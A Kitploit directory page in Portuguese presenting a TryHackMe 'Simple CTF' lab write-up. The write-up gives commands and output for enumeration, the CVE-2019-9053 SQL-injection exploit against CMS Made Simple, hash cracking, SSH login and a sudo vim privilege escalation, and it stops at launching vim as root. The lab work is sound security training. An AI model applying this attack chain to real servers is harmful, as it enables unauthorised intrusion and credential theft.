Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Simple-CTF-Writeup — Walkthrough profissional do TryHackMe Simple CTF cobrindo enumeração, injeção SQL no CMS Made Simple (CVE-2019-9053), recuperação de credenciais, acesso SSH, escalonamento de privilégios via Vim e comprometimento root. | Kitploit
Ferramentas/GitHubGitHub/imperialx1104/simple-ctf-writeup
Quebra de SenhasEscalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

Walkthrough profissional do TryHackMe Simple CTF cobrindo enumeração, injeção SQL no CMS Made Simple (CVE-2019-9053), recuperação de credenciais, acesso SSH, escalonamento de privilégios via Vim e comprometimento root.

Ver Repositório
14há 4 mesesAinda não revisado

Writeup do Simple CTF

Walkthrough profissional do TryHackMe Simple CTF cobrindo enumeração, SQL Injection no CMS Made Simple (CVE-2019-9053), recuperação de credenciais, acesso SSH, escalonamento de privilégio via Vim e comprometimento de root.

TryHackMe - Writeup do Simple CTF

Um walkthrough completo da sala Simple CTF no TryHackMe, cobrindo reconhecimento, enumeração, exploração, recuperação de credenciais, escalonamento de privilégio e captura de flags.


Informações da Sala

CampoValor
PlataformaTryHackMe
Nome da SalaSimple CTF
DificuldadeFácil
CategoriaExploração Web & Escalonamento de Privilégio Linux
AutorSaahil Gupta (ImperialX1104)

Objetivo

O objetivo desta sala é:

  • Enumerar a máquina alvo
  • Descobrir serviços e aplicações ocultos
  • Explorar um CMS vulnerável
  • Recuperar credenciais
  • Obter acesso SSH
  • Escalonar privilégios para root
  • Capturar ambas as flags

Visão Geral do Ataque

Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

Reconhecimento

Descoberta de Host

O primeiro passo foi verificar a conectividade com a máquina alvo.

Comando

ping 10.49.175.174

Resultado

O host respondeu com sucesso, confirmando que estava acessível.

Captura de Tela

Ping Scan


Enumeração de Portas

Uma varredura Nmap abrangente foi realizada para identificar serviços expostos.

Comando

nmap -A -v 10.49.175.174

Resultados

PortaServiçoVersão
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

Descobertas Notáveis

  • Login FTP anônimo habilitado
  • Servidor web Apache em execução
  • SSH exposto na porta 2222
  • Arquivo robots.txt descoberto

Captura de Tela

Nmap Enumeration


Enumeração Web

Navegando até o servidor web alvo exibiu a página inicial padrão do Apache.

URL

http://10.49.175.174

Captura de Tela

Apache Default Page

Nesta fase, nenhuma superfície de ataque óbvia era visível.


Enumeração de Diretórios

Para identificar recursos ocultos, foi realizada uma força bruta de diretórios usando FFUF.

Comando

ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

Resultados

simple [Status: 301]

Captura de Tela

FFUF Enumeration

Um diretório chamado /simple foi descoberto.


Descoberta do CMS

Navegando até o diretório descoberto revelou uma instalação de CMS.

URL

http://10.49.175.174/simple

Captura de Tela

CMS Made Simple

CMS Identificado

CMS Made Simple 2.2.8

O número da versão mais tarde se mostraria crítico.


Pesquisa de Vulnerabilidade

A versão do CMS foi pesquisada usando SearchSploit.

Comando

searchsploit "CMS Made Simple"

Resultado

CMS Made Simple < 2.2.10 - SQL Injection

Captura de Tela

SearchSploit Results

Uma vulnerabilidade conhecida de SQL Injection foi identificada.


Aquisição do Exploit

O exploit foi copiado localmente para análise e execução.

Comando

searchsploit -m 46635

Saída

CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

Captura de Tela

Exploit Download


Exploração

O exploit disponível publicamente foi executado contra a instância do CMS alvo.

Comando

python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

Extração de Credenciais

O exploit extraiu com sucesso informações do banco de dados de backend.

Saída

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

Captura de Tela

Credential Extraction

Informações Recuperadas

ItemValor
Usernamemitch
Email[email protected]
Salt1dac0d92e9fa6bb2

Quebra de Senha

O hash extraído foi quebrado usando Hashcat.

Comando

hashcat -m 20 hash.txt --show

Saída

0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

Credenciais Recuperadas

CampoValor
Usernamemitch
Senhasecret

Captura de Tela

Hashcat Password Recovery


Acesso Inicial

As credenciais recuperadas foram testadas contra o serviço SSH.

Comando

ssh [email protected] -p 2222

Senha

secret

Resultado

Welcome to Ubuntu 16.04.6 LTS

Captura de Tela

SSH Access

A autenticação bem-sucedida forneceu acesso ao shell como usuário mitch.


Flag de Usuário

Após obter acesso, a flag de usuário foi localizada no diretório home de Mitch.

Comandos

whoami
cd ~
cat user.txt

Saída

G00d j0b, keep up!

Captura de Tela

User Flag


Escalonamento de Privilégio

Enumeração de Sudo

Verificar as permissões sudo revelou uma configuração interessante.

Comando

sudo -l

Saída

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Captura de Tela

sudo -l Output

Essa configuração permite que o usuário execute o Vim com privilégios de root sem fornecer uma senha.


Acesso Root

Iniciando o Vim como root:

sudo vim

Como o Vim estava sendo executado com privilégios elevados, poderia ser usado para acessar arquivos de propriedade do root.

Baixar ferramenta